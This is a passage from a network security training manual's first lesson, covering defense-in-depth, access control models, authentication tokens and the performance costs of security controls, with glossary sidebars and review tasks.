functions can occur within a system built on trust. They should have complete
condence in security.
Network security must become a strategic initiative within the enterprise. It must
begin as an integral part of the strategic planning process that leads to strategic
action plans, resulting in budgeted tactical projects to initiate and implement net-
work security.
The defense of the network starts with the basic security issues all networks must
address. These key issues are detailed in upcoming sections.
network:
Two or more machines
interconnected for
communications.
threat:
The means through which
the ability or intent of a
threat agent to adversely
affect an automated system,
facility, or operation can be
manifest. A potential
violation of security.
security:
A condition that results from
the establishment and
maintenance of protective
measures that ensure a state
of inviolability from hostile
acts or inuences.
network security:
Protection of networks and
their services from
unauthorized modication,
destruction, or disclosure,
and provision of assurance
that the network perform its
critical functions correctly
and there are no harmful
side effects. Network security
includes providing for data
integrity.
2 Tactical Perimeter Defense
Five Key Issues of Network Security
The ve key issues of network security are:
Authorization and availability
Authentication
Condentiality
Integrity
Non-repudiation
Authorization and Availability
First and foremost, network security systems must be operationally available in
order to control who has access to what information technology (IT) assets,
resources, les, directories, and processes within the network. The security must
limit user privileges to minimize the risk of unauthorized access to sensitive
information and areas of the network that only authorized users should be
allowed to access. Additionally, it must make network systems available through
the diligent exercise of security, but never hinder the performance of the network
system to serve the authorized user.
Authorization and availability also create system assurance, which ensures that:
Systems are available with required functionality present and correctly con-
gured for implementation on an ongoing basis.
There are adequate controls to protect against unauthorized user access and
unintentional errors by users or software.
There are security measures in place to deter or stop intentional exploits by
attackers.
Assurance is absolutely necessary because without it, the other objectives of secu-
rity will be difficult to meet. However, assurance cannot be a one-time promise
but must be an ongoing effort to be most effective.
Authentication
After controlling who has access, even authorized users must be authenticated to
verify and prove their identity. Authentication veries users to be who they say
they are. In data communications, authenticating the sender is necessary to verify
that the data came from the right source. The receiver is authenticated, as well, to
verify that the data is going to the right destination. Public Key Infrastructure
(PKI), is one of the best ways to ensure authentication through digital certicates
and digital signatures. The number of factors used to show the identity of the
user through authentication or proving the identity of the user through strong
authentication determines how effective authentication can be. The three factors
are:
One-factor authentication provides what you knowsuch as a password or
PIN. It is strictly based on recalling a piece of information from ones own
memory or from writing it down (but that would defeat the purpose of pro-
viding only authorized access to networks based on using a password).
Two-factor authentication provides what you have in addition to what you
know. Examples are a proximity card for door entry or an ATM card with a
PIN. An RSA SecureID Token used in conjunction with a pass code, or a
availability:
Assuring information and
communications services will
be ready for use when
expected.
authentication:
To positively verify the
identity of a user, device, or
other entity in a computer
system, often as a
prerequisite to allowing
access to resources in a
system.
Lesson 1: Network Defense Fundamentals 3
smart card that may carry all your security credentials in a secure way with
a PIN used to access the credentials are the second factors.
The third factor that provides strong authentication is proving the users
identity, or who you are, by using biometrics. Biometrics uses a physiologi-
cal characteristic to identify you, such as a ngerprint, retina scan, hand
geometry, voice recognition, iris scan, or behavioral characteristics, such as
keystroke recognition or signature recognition. It results in strong authentica-
tion, because users not only verify their digital identity through what they
know and what they have, but they are proving their physical identity by
verifying their biometric characteristics.
Confidentiality
Data communications, as well as email, needs to be protected for privacy and
condentiality. Network security must provide a secure channel for the transmis-
sion of data and email that does not allow eavesdropping by unauthorized users.
Data condentiality ensures the privacy of data on the network system. PKI can
provide what is required to ensure the condentiality and privacy of communica-
tions and data transmissions across networks. The following are the four basic
types of information or data that require condentiality:
Information that reveals technical data or source information. For example,
the model number and software version of your rewall should be kept con-
dential because divulgence may give a potential attacker/hacker a way to
an advantage to exploit your system.
Information that may be time dependent. It may only be condential for a
given amount of time and then may not have any signicance as private
information after that, but until then must be kept condential.
Information that may reveal organizational or systems relationships that
through divulgence may give unauthorized users a channel for social engi-
neering exploits or other opportunities.
Information that is private and condential in its own right. Information that
may be crucial in the operations of the enterprise and divulgence would
surely give an attacker an easy exploitation opportunity.
condentiality:
Assuring information will be
kept secret, with access
limited to appropriate
persons.
rewall:
A system or combination of
systems that enforces a
boundary between two or
more networks. Gateway that
limits access between
networks in accordance with
local security policy. The
typical rewall is an
inexpensive micro-based
Unix box kept clean of
critical data, with many
modems and public network
ports on it, but just one
carefully watched connection
back to the rest of the
cluster.
hacker:
A person who enjoys
exploring the details of
computers and how to
stretch their capabilities. A
malicious or inquisitive
meddler who tries to
discover information by
poking around. A person
who enjoys learning the
details of programming
systems and how to stretch
their capabilities, as opposed
to most users who prefer to
learn the necessary
minimum.
4 Tactical Perimeter Defense
Integrity
Integrity is a security principle that ensures the continuous accuracy of data and
information stored within network systems. Continuity of data integrity is
paramount. Data must be kept from unauthorized modication, forgery, or any
other form of corruption, regardless of whether these are from malicious threats
or corruption that is accidental in nature. Upon receiving the email or data com-
munication, integrity must be veried to ensure that the message has not been
altered, modied, or added to or subtracted by unauthorized users while in transit.
Again, PKI will ensure the integrity of messages through digital certicates and
message digests. Integrity has two main objectives:
Data integrity ensures that the data has not been altered in an unauthorized
manner while in transit, during storage, or while being processed.
System integrity ensures that a system, while performing its intended pro-
cesses and applications, provides support to authorized users free from
unauthorized manipulation.
Non-repudiation
Security must be established to prevent parties in a data transaction from denying
their participation after the business transaction has occurred. Through PKI, the
sender as well as the receiver are authenticated with regard to their respective
identities, as well as tamperproof time stamping of the transaction, to ensure non-
repudiation from both parties. This establishes accountability for the transaction
itself for all parties involved in the transaction. The three types of repudiation (or
denial) to prevent are:
Repudiation of origin by the message creator who denies ever creating or
writing the message itself.
Repudiation of receipt by the receiver who denies ever receiving the mes-
sage even after receiving it.
Repudiation of submission as to the time and date of the actual submission.
The time stamp will help in non-repudiation for submission.
The Threats to Security
Threats can come from myriad sources in our connected world. The Internet is
not the only threat. An organization has to consider employees, contractors, and
even the cleaning staff! Any of these people could potentially be a threat, and
cause damage.
integrity:
Assuring information will not
be accidentally or
maliciously altered or
destroyed.
non-repudiation:
Method by which the sender
of data is provided with
proof of delivery and the
recipient is assured of the
senders identity, so that
neither can later deny having
processed the data.
Lesson 1: Network Defense Fundamentals 5
Malicious threats are intentional in nature and can come from either internal or
external users. When unauthorized users make attempts to nd vulnerabilities in a
network system and nd them, they present themselves as a malicious threat try-
ing to get access by whatever means available. A successful unauthorized access
event is called an active threat. The malicious threat has now gained unauthorized
access into your network and will exploit whatever assets can be accessed. Once
accessed, the exploit can manifest itself as a passive or an active threat.
As a passive threat, the accessed data is viewed or intercepted but not
modied. It does not change the operation of or the state of the system.
If the data is intercepted and modied by an unauthorized user, it is said to
be an active threat. It may also change the operation of or state of the sys-
tem itself.
Whether accidental or malicious, the threat can come from either internal or
external users and may be authorized or unauthorized users. Surveys have consis-
tently shown that of all respondents who reported a security breach within the
past year, close to 60 percent of these breaches were caused by inside users
accessing unauthorized resources, and over 40 percent blamed accounts left open
after an employee had left the company. Of all respondents, 20 percent reported
that their companies were victims of an attempted or successful break-in by an
angry former employee. Also, during most economic slowdowns, companies lay
off employees in increasing numbers each week. Such breaches will only get
worse during these periods.
Network security administrators must:
Realize how to minimize, or mitigate, the effects of current and future
threats upon their network.
Realize what defensive strategies and techniques must be implemented to
keep networks secure. This should be done to ensure the privacy, condenti-
ality, and protection of sensitive data and information technology assets.
Defensive Strategies
If all threats to a network system were known, as well as all the vulnerabilities of
the system itself, then a specic defensive posture could be deployed to guard
and secure the system. It could even be a static defensive posture with denitive
controls in place because the exact threat would be known. Perimeter security
using a rewall is a good example of a static defensive posture. The threat is
assumed to be known and rules are generated to allow the rewall to work.
Unfortunately, if the threat is not known, any such assumptions can be fatal to the
network. Administrators must take into consideration the following points when
addressing and creating a defensive posture for the enterprise network.
Defense-in-Depth
Defense-in-Depth states that all information technology assets within a protected
network need to have the necessary amount of security protection to guard
against direct attacks at whatever level the asset resides within the network. The
assumption cannot be made that a rewall or some sort of all-encompassing
perimeter security is enough to protect all information technology assets within
the network.
passive threat:
The threat of unauthorized
disclosure of information
without changing the state of
the system. A type of threat
that involves the interception,
not the alteration, of
information.
breach:
The successful defeat of
security controls which could
result in a penetration of the
system. A violation of
controls of a particular
information system such that
information assets or system
components are unduly
exposed.
6 Tactical Perimeter Defense
Active Defense-in-Depth
An Active Defense-in-Depth is necessary as a defensive posture to think cre-
atively and counter any and every threat, whether known or unknown. It is an
active defense that changes its defensive posture based on the threat. Its defensive
assets are able to ex in any direction, based on the disposition of the threat. The
basis for Active Defense-in-Depth are the concepts of Defense-in-Depth.
The requirement for securing network systems and their information technology
assets against all current and future threats compels us to use multiple layers of
security techniques that provide overlapping protection against attackers, hackers,
and any other malicious threat that may attempt an exploit. This is a core require-
ment for any network taking active measures to protect its assets.
This strategy not only recognizes the value of Defense-in-Depth, which states that
every information technology asset within the network must have its own neces-
sary and adequate protection, but that it is an active defense that takes whatever
actions necessary to stop the threat by the utilization of multiple layers of security
to include rewalls, intrusion detection, monitoring devices, and other techniques
for network security. It recognizes that due to the highly interactive nature of the
various systems and networks, any single system cannot be secured adequately
unless all interconnecting systems are also secured adequately. It must take into
consideration the context of a shared-risk environment that dictates protection of
IT systems at all levels, because of the interactive and interconnected nature of
todays systems and networks.
The strategy calls for use of multiple, overlapping protection approaches to
ensure that the failure or bypass of any individual protection approach will not
leave the system unprotected. Through user training and awareness, well thought-
out and planned policies, procedures and processes, as well as redundancy of
protection mechanisms, the Active Defense-in-Depth strategy ensures the effective
protection of information technology assets so the objective and purpose of the
mission can be accomplished.
An Active Defense-in-Depth utilizes the concept of addressing the largest vulner-
ability or the most dangerous threat rst. The additional layers of security can
take care of the remainder of the threats. Anything else is less of a threat and
many times the perimeter defense with rewalls can take care of many of the
everyday types of threats.
There is a general ow of the Active Defense-in-Depth strategy. The rst area is
to advance the users security knowledge via training. Users must realize that the
upcoming changes in the network are to protect them, and if they are required to
act differently while online, then they must follow the security policy and do so.
intrusion detection:
Pertaining to techniques that
attempt to detect intrusion
into a computer or network
by observation of actions,
security logs, or audit data.
Detection of break-ins or
attempts either manually or
via software expert systems
that operate on logs or other
information available.
vulnerability:
Hardware, rmware, or
software ow that leaves an
AIS open for potential
exploitation. A weakness in
automated system security
procedures, administrative
controls, physical layout,
internal controls, and so
forth, that could be exploited
by a threat to gain
unauthorized access to an
AIS.
Lesson 1: Network Defense Fundamentals 7
Security must then be established with a strong perimeter system. Inside the net-
work, the Intrusion Detection System is working hard to identify unauthorized
attempts to use resources. The stated strategy will respond to an attack, again as
per the dened security policy. Finally, further controls and systems will be in
place to minimize the likelihood of further intrusions and create a more trusted
environment.
After each part of the defense strategy, the lessons that have been learned are
used to strengthen the overall security of the network. Figure 1-1 illustrates this
concept.
Figure 1-1: The Active Defense-in-Depth model.
Defensive Strategy Requirements
Any network that is going to deploy a defense system to protect their network
must fulll some common requirements if the defense is going to be successful.
Although these are not written as hard and fast rules, they should be followed in
nearly all organizations.
attack:
An attempt to bypass
security controls on a
computer. The attack may
alter, release, or deny data.
Whether an attack will
succeed depends on the
vulnerability of the computer
system and the effectiveness
of existing countermeasures.
intrusion:
Any set of actions that
attempts to compromise the
integrity, condentiality, or
availability of a resource.
8 Tactical Perimeter Defense
Training and Awareness
Training and awareness is the foundation for the Active Defense-in-Depth defen-
sive posture because through training and awareness, cultural change within the
enterprise occurs. A cultural change is required for all users to exercise security
in their day-to-day operations and functions in execution of their processes. Mili-
tary units that have a high rate of operational readiness for combat use a maxim
that states, Train like you ght because you will ght like you train. Theres a
lot to be learned from such a maxim. It means that training must be realistic and
replicate battle conditions. Training must replicate the same scenarios that may
expose vulnerabilities for attack by the threat. The same battle scenarios are pre-
sented in training to make attack response a second nature to the user, as well as
the security professional overlooking the protection of the network.
Perimeter Security
Perimeter security is the rst line of defense for the network and usually is pro-
tected by a packet ltering or rules-based rewall. In order to be most effective,
ensure that the rewall has the following properties and rules:
Base your packet ltering and traffic management rules according to an orga-
nizational security policy.
Firewall denes all network connections.
All traffic from inside out and outside in must pass through the rewall.
Intrusion Detection Systems (IDS)
Intrusion Detection Systems (IDS) are a combination of hardware and software
systems that monitor and collect network system information and analyze it to
detect attacks or intrusions. Some IDSs can automatically respond to an intrusion
or attack based on a collected library of attack signatures. IDSs use software-
based scanners, such as an Internet scanner, that may be the primary tool for
network vulnerability analysis. This type of scanner performs both scheduled and
deliberate probes of the network infrastructure for aws and vulnerabilities in
operating systems, routers, applications, and communication devices.
packet:
A block of data sent over the
network transmitting the
identities of the sending and
receiving stations, error-
control information, and
message.
packet ltering:
A feature incorporated into
routers and bridges to limit
the ow of information based
on pre-determined
communications such as
source, destination, or type
of service being provided by
the network. Packet lters let
the administrator limit
protocol-specic trafc to
one network segment, isolate
email domains, and perform
many other functions.
router:
An interconnection device
that is similar to a bridge,
but serves packets or frames
containing certain protocols.
Routers link LANs at the
network layer.
vulnerability analysis:
Systematic examination of an
AIS or product to determine
the adequacy of security
measures, identify security
deciencies, provide data
from which to predict the
effectiveness of proposed
security measures, and
conrm the adequacy of
such measures after
implementation.
Lesson 1: Network Defense Fundamentals 9
Attack Response
Attack response consists of many practices in response to attacks or incidents
whether real, false, or simulated for training. All attacks are handled the same
way until it is veried by the administrator that it is in fact a false positive or a
simulated attack for training. In any case, the response itself needs to be kept
secret from outside the security network as not to give any potential attackers an
advantage or possible vulnerability to exploit. A ready response team should be
designated and alerted in a timely fashion once any attack has been detected. This
team must have senior management backing and technical training to include
security policy creation, maintenance, enforcement, and escalation during
response in case the team cannot handle the particular attack.
TASK 1A-1
Identifying Non-repudiation Issues
1. What are the three potential problems a network could face if there is
no assurance of non-repudiation, and what is the potential excuse for
each problem?
The following examples of excuses that people are known to routinely give
each other are indicative of the potential problems in a network if non-
repudiation is not implemented:
Repudiation of origin: I never sent it.
Repudiation of receipt: I never received it.
Repudiation of submission: I sent it out a while back versus You say
you sent it out when? I only received it yesterday.
Topic 1B
Defensive Technologies
To have a network that can be considered well-secured requires a layered
defense. The concepts of a layered defense are old and simple: The more layers
an attacker will have to go through, the more difficult it is for the attack to be
successful.
The Castle Analogy
This concept can be traced back very far; for this discussion, we will go back to
the days of castles and fortresses. These buildings often housed hundreds of
people and their rulers. In some cases, the castle was the entire town, with small
huts outside the castle boundaries. Needless to say, they required very good and
reliable security.
false positive:
Occurs when the system
classies an action as
anomalous (a possible
intrusion) when it is a
legitimate action.
10 Tactical Perimeter Defense
A castles defense system is the classic layered concept. The castle itself is built
out of strong and very thick stone. The walls of the castle are very high. The
towers of the castle are even higher and allow the guards to see intruders at a
greater distance. Other guards are positioned inside to watch for imposters and
other internal disruptions.
Closer to the castle is the moat, a body of water surrounding the castle. The only
entrance is the drawbridge, which can be raised so no one can enter or leave
without permission. There is a massive door protecting the entrance past the
drawbridge. Small arrow holes are hidden along the walls and in the towers for
archers to use; these make it easy for arrows to get out of the castle but difficult
to shoot an arrow into one of those holes.
As you can see, each additional layer of defense created a more secure overall
castle. The analogy is directly transferable to networking. No one single technol-
ogy can create a secure network, just as a moat alone cannot create a secure
castle.
Attacking the Castle
If the castles were so well defended, then how and why did they eventually fall?
With layers upon layers of defense, the castles seemed as if they could not fall
into their enemys hands. History tells us otherwise.
There were three basic approaches to bringing upon the downfall of a castle.
One was through a massive attack, where hundreds or thousands of soldiers
would storm the castle, a constant attack until the massive door nally was
penetrated. This method generally would cost many lives, but often was
successful.
The second approach was a variation of the rst. Instead of actually storm-
ing the castle, a large army would simply lay siege to the castle for months
until nally the defenders would give up.
The third method was to nd the secret entrance(s). Often the castle needed
secret alternate ways in and out for emergencies. Once the enemy found this
second entrance, they could send a small force in to open the castle from
inside. This would prove to be a more effective method, since the cost in
lives to the attacker was far less.
Now, looking at this analogy, what are the defensive technologies employed in
todays network security terms? There are many similarities, as you may have
noticed.
The Castles Firewall
In the castle analogy, there is a denite rewall in place. The two parts would be
the moat and the high stone walls. This is how the rewall should operate in a
networkmultiple parts. For example, you may have a rewall blocking ports,
and another part of the rewall that is running Network Access Translation (NAT)
to hide your internal IP addresses. These pieces are the classic perimeter security
system, and all networks that are serious about security must have them.
Lesson 1: Network Defense Fundamentals 11
Further analogies to the rewall are the arrow holes and the front door itself.
These arrow holes are roughly equivalent to protocol port numbers, in that they
are small and can be set up to be only one-way. Arrows go out, but they do not
come back in. The front door can be opened to allow full two-way movement or
communication.
The Castles Intrusion Detection
The guards on the inside watching for an imposter or other internal problem are
the intrusion detection. The guards high up in the watchtower are also part of the
Intrusion Detection System, looking for attackers from the outside.
The Castles Back Doors
One of the most serious problems with the security of a network is a back door.
If a user installs a modem and makes an independent, direct connection to the
Internet, all an attacker needs to do is nd that back door. Once the back door is
found, the attacker can come in and open up the entire network from the inside.
This analogy is used to illustrate the need for a solid, well-planned, layered
defense strategy for the network. Since any single point is subject to attack and
potential failure, there must be other systems in place that work as defense for
the network. Figure 1-2 is a graphical representation of the layered concept.
Figure 1-2: The layered defense concept.
protocol:
Agreed-upon methods of
communications used by
computers. A specication
that describes the rules and
procedures that products
should follow to perform
activities on a network, such
as transmitting data. If they
use the same protocols,
products from different
vendors should be able to
communicate on the same
network.
back door:
A hole in the security of a
computer system deliberately
left in place by designers or
maintainers. Synonymous
with trap door; a hidden
software or hardware
mechanism used to
circumvent security controls.
12 Tactical Perimeter Defense
The Defense Technologies
So, what exactly are the defensive technologies that can be deployed in a net-
work? There are many, and some are not purely defensive, but they are used in
the defense of the network.
Figure 1-3: The layers of defense in reaching a le.
The best way of looking at the defense of the network is to start on the outside,
at the perimeter, and work your way in to the target. The target may be a number
of different things, but we will focus in this discussion on an application residing
on a host computer.
1. The rst aspect in the defense of the network does not even use electricity. It
is the security policy. Many people consider the rewall the rst line of
defense, but this could be argued as incorrect. Without a policy, the rewall
cannot be congured! So, the rst item is the policy. There must be a clear
understanding of the purpose of the security in the network. The policy must
cover who can do what, when, and how. The policy also must state the clear
objectives of each piece of equipment used in the defense of the network. As
with many things in life, proper planning is required for successful
implementation.
2. After the security policy has been created and agreed to, the implementation
of the defense systems can begin. On the very edge of the network are the
routers. These routers may be congured, via access control lists, to perform
host:
A single computer or
workstation; it can be
connected to a network.
proxy:
A rewall mechanism that
replaces the IP address of a
host on the internal
(protected) network with its
own IP address for all trafc
passing through it. A
software agent that acts on
behalf of a user, typical
proxies accept a connection
from a user, make a decision
as to whether or not the user
or client IP address is
permitted to use the proxy,
perhaps does additional
authentication, and then
completes a connection on
behalf of the user to a
remote destination.
Lesson 1: Network Defense Fundamentals 13
part of the rewall system, and provide some level of packet ltering. The
rewall may provide NAT and proxy services. NAT will ensure that the
internal private addresses stay hidden, and the proxy services will make
requests for resources on behalf of the internal clients.
3. Moving through the layers, beyond the rewall, the next piece is the IDS.
The IDS is in place to notify the security professionals when an intrusion
has happened, and can perform this function both on the inside of the net-
work, and also detect attempts on the outside of the network.
4. Still deeper into the defense of the network is authentication. The host com-
puter will require a form of authentication to gain access to the resources.
Making it to the host is one thing, authenticating with the host and getting
access is another.
5. After authentication with the host is the le system security. Each le, or
each resource, should be designed with its own security. This security dic-
tates who has access to this le, and what kind of access each person has.
The le security may even specify the times during the day that users have
access to the le.
The physical security of the network, although not a specic technology, is worth
mentioning. Physical security of the computers, routers, switches, and employees
is critical to maintaining a well-defended network. There is no point in imple-
menting all the above technologies, if anyone can walk into an office and browse
a computer. Physical access must be part of the defense, and should be outlined
in the security policy.
TASK 1B-1
Describing the Layers of a Defended Network
1. Describe how an organization benets from implementing each layer of
a layered defense to protect their network.
Benets to implementing a layered defense include:
Security Policy: Organized defense.
Perimeter Defense: Rule sets dene what kind of traffc is allowed in or
out.
IDS: Monitoring of network or hosts to detect unusual behavior or
attacks so that responses can be calculated, rather than remain
arbitrary.
Authentication: Depending upon the level of authentication used (one-,
two-, or three-factor), it can be very diffcult for one user to imperson-
ate another.
File System Security: Users with veried credentials are granted or
denied access to certain resources.
Physical Security: Prevents access to machines by users with malicious
intent.
NAT and proxy services are
covered in greater detail in
upcoming lessons.
physical security:
The measures used to
provide physical protection
of resources against
deliberate and accidental
threats.
14 Tactical Perimeter Defense
Topic 1C
Objectives of Access Control
Every network, no matter how well it is defended, will require verication of the
network users credentials. This is the process of access control. All networks
need a system in place to be sure only authorized users have access to the net-
work and its resources.
Access Control
On the network, one of the critical areas of security is determining who has
access to what. It is the security professionals job to ensure that the policy
guidelines are met and no unauthorized access of resources takes place. Or, as the
denition of access control states, it is the prevention of unauthorized use by con-
trolling the access to any protected system or resource.
Access control systems are what help the security professional satisfy that
requirement. There are two types of access control that may be implemented:
Mandatory Access Control (MAC) and Discretionary Access Control (DAC). The
policy in place determines which of these controls will be used.
Mandatory Access Control
MAC is an access control policy that supports a system which generally handles
highly sensitive or secret information. Government agencies typically use MAC.
Also, the security classication of both the user, called a subject, and the data or
resource being accessed, called an object, must be labeled as Top Secret, Secret,
or Classied for security. These labels are security classications for objects and
security clearances for subjects. If only one level of security is maintained in a
system, it is called a System High Policy, which requires all system users to have
the appropriate clearance for the highest level of sensitive information that may
be accessed. If Secret information is on this system, then all authorized users
must have at least a Secret clearance level. If multiple levels of classied infor-
mation are on a single system and requires users with different security clearances
to access it, then a Multi-level Security Policy is enforced. To make this effective,
the system typically has screened subnets by use of rewalls to allow access only
to appropriate clearance-level users.
Discretionary Access Control
DAC is an access control policy that uses the identity of the user or group in
which they belong to allow authorized access. It is discretionary in that the
administrator is able to control who has access, to what, and what type of access
they will have, such as create or write, read, update, or delete. This is known as
CRUD, which stands for Create, Read, Update, and Delete.
Lesson 1: Network Defense Fundamentals 15
Authentication
Once the policies of access control are in place, there needs to be a mechanism
that can verify the user who is requesting access. Having either DAC or MAC in
the organizations network is useless if the network cannot identify the users of
the network. This is where authentication comes in. Although each operating sys-
tem has its own methods of authentication, here we will discuss the concepts and
methods of authentication.
How is authentication dened? The basic denition is the process of determining
the identity of a user that is attempting to access a system. (The word system
in this case could be a router, server, workstation, and so on.)
Authentication occurs when a user provides the requested information to an
authentication verication authority. The requested information can take many
forms, as you will see. The verication authority can also take different forms,
but is generally a server on the network.
The traditional method of authentication is to provide a password. This password
is a value that the user creates individually, or is generated for them. In any case,
it is a value the user remembers and enters when requested. Systems can be as
simple as having a single password to log in and use every resource available, or
as complex as requiring one password to log in and different passwords to access
specic resources.
To increase the level of reliability and ease of use to users, biometric authentica-
tion can be introduced. When this type of system is added to the authentication
scheme, it is considered to be strong authentication. The designation of strong is
given since the user is not only identied digitally, but by their physical person
via a physiological characteristic, such as a ngerprint scan, iris scan, or hand
geometry.
Authentication Tokens
For some organizations, the traditional methods of using passwords are not
enough and the implementation of a biometric solution, such as ngerprint scan-
ning, does not meet their policy requirements. These organizations may then look
to tokens. Tokens come in different sizes and implementations.
An authentication token is a portable device used for authenticating a user,
thereby allowing authorized access into a network system. The tokens are literal
physical devices and they operate by using systems such as challenge and
response or time-based code sequences. One of the most well-known is the RSA
SecureID Token.
Challenge Response Token
The challenge response token is an authentication technique using a calculator
type of token that contains identical security keys or algorithms as a Network
Access Server (NAS). This sends an unpredictable challenge to the user, who
computes a response using their authentication response token. This is shown in
Figure 1-4.
server:
A system that provides
network service such as disk
storage and le transfer, or a
program that provides such a
service. A kind of daemon
that performs a service for
the requester, which often
runs on a computer other
than the client machine.
16 Tactical Perimeter Defense
Figure 1-4: An example of a challenge response card from Cryptocard.
The Challenge Response Process
Each challenge response token is pre-loaded with a Data Encryption Standard
(DES) encryption key and a default user PIN unique to that token in association
with a User Name. Neither of these items can be extracted from the token.
Upon receiving a new token, the user must take the following steps to access a
secured network using challenge/response technology:
1. Activate the token by changing the PIN to one known only by the user. User
enters the chosen PIN on the token.
2. The user begins the logon sequence.
3. The user types in the User ID from the requesting PC.
4. The NAS passes the PIN and User ID to the authentication server as part of
the logon request.
5. The authentication server generates a random challenge and sends it back to
the user via the connection through the NAS.
6. It is then sent to the user where it appears on the requesting PC screen.
7. The user types the challenge into the token, which then encrypts it using its
internal DES key.
8. The token displays the encrypted response.
9. The user types the encrypted response into the requesting PC keyboard.
10. The authentication server receives the response, and using the same DES key
that the token used, processes it and veries the user and the token.
11. The authentication server sends a message to the NAS to allow the user
access.
DES:
(Data Encryption Standard)
Denition 1: An unclassied
crypto algorithm adopted by
the National Bureau of
Standards for public use.
Denition 2: A cryptographic
algorithm for the protection
of unclassied data,
published in Federal
Information Processing
Standard (FIPS) 46. The
DES, which was approved by
the National Institute of
Standards and Technology
(NIST), is intended for public
and government use.
key:
A symbol or sequence of
symbols (or electrical or
mechanical correlates of
symbols) applied to text in
order to encrypt or decrypt.
Lesson 1: Network Defense Fundamentals 17
Figure 1-5: An example of the challenge response token authentication system.
Time-based Tokens
The challenge response token system is widely used on many networks today.
There is a different type of token that is also currently used. It is the time-based
token. Where the challenge response token requires the user to enter data in the
token and read data back out of the token, the user in the time-based token only
reads data.
Figure 1-6: An example of the time-based token authentication system.
The time-based token utilizes an authentication technique where the security
token and the security server use an identical algorithm. To gain access, the user
takes the code generated by the token and adds their user name and PIN to create
a passcode. The passcode is combined with a seed value and the current time,
which is then encrypted with an algorithm and sent to the server. The server
authenticates the user by generating its own version of the valid code by access-
ing the pre-registered PIN and using the same seed value and algorithm to
validate the user and their token.
Figure 1-7: An example of the RSA SecureID token.
18 Tactical Perimeter Defense
Time-based and challenge response tokens are both good examples of two-factor
authentication. The server validates what they know (the user name and PIN) and
what they have (the authentication token).
Software Tokens
If an organization does not wish to purchase hardware tokens such as those
described, they may opt for a software solution instead. A software token is an
authentication technique using a portable device such as a Palm Pilot, Palm PC,
or Wireless Telephone to carry the embedded software.
When attempting to access the secured network, the user is prompted to provide
their PIN (pre-registered with the server in association with the user name) and
authentication code, which is generated by the software token. This information is
routed to an access server such as an RSA ACE/Server for verication. If the PIN
and authentication code are valid, the user is granted access. If not, the user is
denied access to the network.
Figure 1-8: An example of a Palm Pilot running RSA security software.
Lesson 1: Network Defense Fundamentals 19
TASK 1C-1
Describing the Challenge Response Token Process
1. Describe the Challenge Response token process between the user, client,
and server.
Each challenge/response token is pre-loaded with a DES (Data Encryption
Standard) encryption key and a default user PIN unique to that token in
association with a user name. Neither of these items can be extracted from
the token. Upon receiving a new token, the user must follow several steps to
access a secured network by using challenge/response technology.
2. Place the following steps in the proper order.
7 The user types the challenge into the token, which then encrypts it
using its internal DES key.
3 The user types in the User ID from the requesting PC.
10 The authentication server receives the response and using the same
DES key that the token used, processes it, and veries the user and the
token.
4 The NAS passes the PIN and User ID to the authentication server as
part of the logon request.
8 The token displays the encrypted response.
11 The authentication server sends a message to the NAS to allow the
user access.
1 The token is activated by changing the PIN to one known only to the
user. User enters the chosen PIN on the token.
6 The challenge is sent to the user where it appears on the requesting PC
screen.
2 The user begins the logon sequence.
9 The user types the encrypted response into the requesting PC keyboard.
5 The authentication server generates a random challenge and sends it
back to the user via the connection through the NAS.
20 Tactical Perimeter Defense
Topic 1D
The Impact of Defense
Network security protects all the information technology assets within the enter-
prise including computers, servers, databases, applications, peripherals, and
perhaps most importantly, data or information. Network security allows autho-
rized users to access IT assets quickly, whenever its needed, all the while
improving communications with internal and external customers within a totally
secure environment.
Implementation of security controls, whether in a layered defense or any other
mode, should not, in any way, hinder the functionality of the network. Networks
must be secure, but the implementation of security cannot hinder the objective
and purpose of the network itself.
Of the different technologies discussed in this lesson, how many could have a
negative impact on the performance of the network? If you answered all of them,
you are correct. However, they do not have to have a negative impact on the
network. Proper implementation of security controls will reduce the impact on the
network.
How exactly do these technologies impact the network in the rst place? Lets
examine some of the technologies discussed previously.
Firewalls
The rewall is the rst line of defense for the network. All packets that enter the
network should come through this point in a properly designed network. A mod-
ern rewall is generally a system of applications and hardware working together.
The jobs a rewall can be asked to perform are packet ltering, network address
translation, and proxy services.
A rewall can have a negative impact on the network by blocking access to
resources that should be accessible. It is possible that, because of improper con-
guration of a rewall, entire portions of a network become unavailable, in which
case the performance hit is signicant. Additionally, if an ordinary PC has been
congured to be the rewall (a multihomed computer), it may not have the inter-
nal speed to perform all the functions of the rewall fast enough, resulting in
latency.
Encryption
The encryption process as a whole involves taking data that is readable in plain
text, and using a mathematical calculation, make the text unreadable. The receiver
then needs to perform a similar calculation to decrypt the message and read it in
its plain text format.
The performance hit is much more obvious with encryption. If the data packets
are encrypted, the information that must be transmitted is larger, and more band-
width will be consumed. Additionally, the devices that perform the encryption and
decryption have more work to do in running the algorithms that perform the task.
Networks that have systems at minimum levels will be affected the most by the
addition of encryption.
Lesson 1: Network Defense Fundamentals 21
Computers and routers that are asked to perform encryption must be able to
handle the extra workload. It is not always the network that has a performance
drop; it is often the computers themselves, as they struggle to keep up with all
the extra processing required to encrypt and decrypt data. File system encryption
can be as much of a performance hit as encrypted network traffic.
Passwords
Forcing hard-to-remember passwords on users results in either the passwords
being written down or frequent calls to the help desk to come and unlock their
computer. This results in a performance hit on the overall functionality of the
entire network. The password issue is a difficult one, as networks require strong
passwords, but users have a hard time creating them. The network administration
staff should take the time to educate users on creating strong passwords.
One of the better methods of making strong passwords that users can remember
is to use phrases instead of words (which should never be used). The phrase
method requires the user to think of a phrase they will remember. This way it can
be related to a users birthday and not be a security risk. For example, I was
Born on June 27! could then be a password of IwBoJ27! This illustrates how
easy it can be to generate secure passwords that can be remembered.
Intrusion Detection Systems
Although some think that an IDS could not have an impact on a network, in real-
ity, it can. It is true that the IDS does not have that much of an impact on the
actual packets as they move about the network; however, this is not the only type
of impact the network must manage.
If an IDS is improperly congured, so that it is identifying traffic not indicative
of an intrusion, and the security professionals spend their time investigating
unneeded attacks, then the IDS has created a signicant problem, not a solved
one. An IDS that is constantly giving off false alarms is a bad thing for the net-
work, as eventually the security team will stop responding, or respond slowly.
Auditing
If a commonly used server has had every single auditing option turned on, the
computer is going to suffer a performance hit in logging all that information. If it
also happens to be a le server, chances are good that available disk space will
be taken up by the log les, again resulting in calls to the help desk.
This can also be a method of hiding an attackers tracks. If an attacker gains
access to a server and enables every single auditing option, it will be much more
work for the administrator to search the log les for the real evidence of the
security breach.
22 Tactical Perimeter Defense
TASK 1D-1
Describing the Problems of Additional Layers of
Security
1. How could adding additional layers of defense cause problems for the
users of a network?
